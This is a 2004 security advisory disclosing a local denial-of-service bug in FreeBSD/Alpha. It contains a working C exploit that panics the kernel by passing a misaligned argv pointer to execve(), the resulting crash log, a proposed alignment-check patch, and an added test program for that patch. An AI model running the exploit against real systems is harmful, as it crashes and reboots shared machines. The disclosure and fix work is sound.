FreeBSD Local DoS Exploit
Source: www.marcetam.net  Author: Marceta  Published: 2004-07-02



/*
 * FreeBSD/Alpha local DoS
 * by Marceta Milos
 * root@marcetam.net
 *
 */

#include <unistd.h>

int main(void)
{
	/* (char *)main + 1 is a user-space address one byte past the entry
	 * point of main, i.e. one that is not 8-byte aligned. Handing it to
	 * execve() as argv makes the Alpha kernel dereference it and take an
	 * unaligned-access trap, which panics the machine (see the trap
	 * output below). The envp argument is simply NULL. */
	execve("/bin/ls", (char *const *)((char *)main + 1), 0);
	return 0;
}

/* eof */

# gcc kernkill.c -o kk
# ./kk

fatal kernel trap:

trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720

pid = 713, comm = kk

panic: trap
cpuid = 0;

syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231
231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...

Workaround:
You may make proper use of the ALIGNED_POINTER macro, which already exists in
src/sys/alpha/include/param.h, to check whether pointers are aligned, or make
your own, like:

#define PTR_ALIGNED(x) (((x) & 0x7) == 0)

Putting the following lines at the top of execve() in
src/sys/kern/kern_exec.c should prevent the crash (unfortunately, this is
not tested. The idea is Marceta Milos', slightly corrected by Mr. Dag-Erling
Smørgrav, FreeBSD deputy security officer):

if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
	return (EFAULT);
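The check above is easy to exercise in user space. The following program is an added example, not code from the advisory or from the FreeBSD tree: it re-creates an ALIGNED_POINTER-style macro and the advisory's PTR_ALIGNED helper, wraps the proposed execve() guard in a hypothetical function check_exec_args(), and feeds it one 8-byte-aligned pointer and one pointer offset by a single byte (the same shape as the exploit's main + 1). The buffer and the function name are constructed for the demonstration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Generic alignment test in the spirit of FreeBSD's ALIGNED_POINTER(p, t)
 * from src/sys/alpha/include/param.h: true when p is aligned to the size of
 * type t. Re-created here for illustration; it is not the kernel's macro. */
#define ALIGNED_POINTER(p, t) ((((uintptr_t)(p)) & (sizeof(t) - 1)) == 0)

/* The helper suggested in the advisory: the pointer must sit on an 8-byte
 * boundary, the natural pointer alignment on Alpha. */
#define PTR_ALIGNED(x) ((((uintptr_t)(x)) & 0x7) == 0)

/* Hypothetical stand-in for the guard the advisory proposes at the top of
 * execve(): reject a misaligned argv or envv pointer with EFAULT instead of
 * letting the kernel dereference it and take an unaligned-access trap. */
int check_exec_args(const void *argv, const void *envv)
{
    if (!PTR_ALIGNED(argv) || !PTR_ALIGNED(envv))
        return EFAULT;
    return 0;
}

/* Returns 1 if p is aligned to a pointer-sized boundary, 0 otherwise. */
int pointer_aligned(const void *p)
{
    return ALIGNED_POINTER(p, void *) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample: a uint64_t array is 8-byte aligned, so its first
     * byte stands in for a legitimate argv array and the byte after it for
     * the misaligned pointer the exploit passes. */
    uint64_t backing[2] = { 0, 0 };
    const char *good = (const char *)backing;
    const char *bad  = good + 1;

    printf("aligned argv/envv -> %d (0 = accepted)\n",
           check_exec_args(good, good));
    printf("misaligned argv   -> %d (EFAULT = %d)\n",
           check_exec_args(bad, good), EFAULT);
    printf("misaligned envv   -> %d\n", check_exec_args(good, bad));
    return 0;
}
```

On a 64-bit host the pointer-sized ALIGNED_POINTER test and the 8-byte PTR_ALIGNED test agree; the point of the exercise is that the guard fails closed with EFAULT before any copy-in touches the bad address, which is what keeps the trap from ever reaching the kernel's fault handler.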
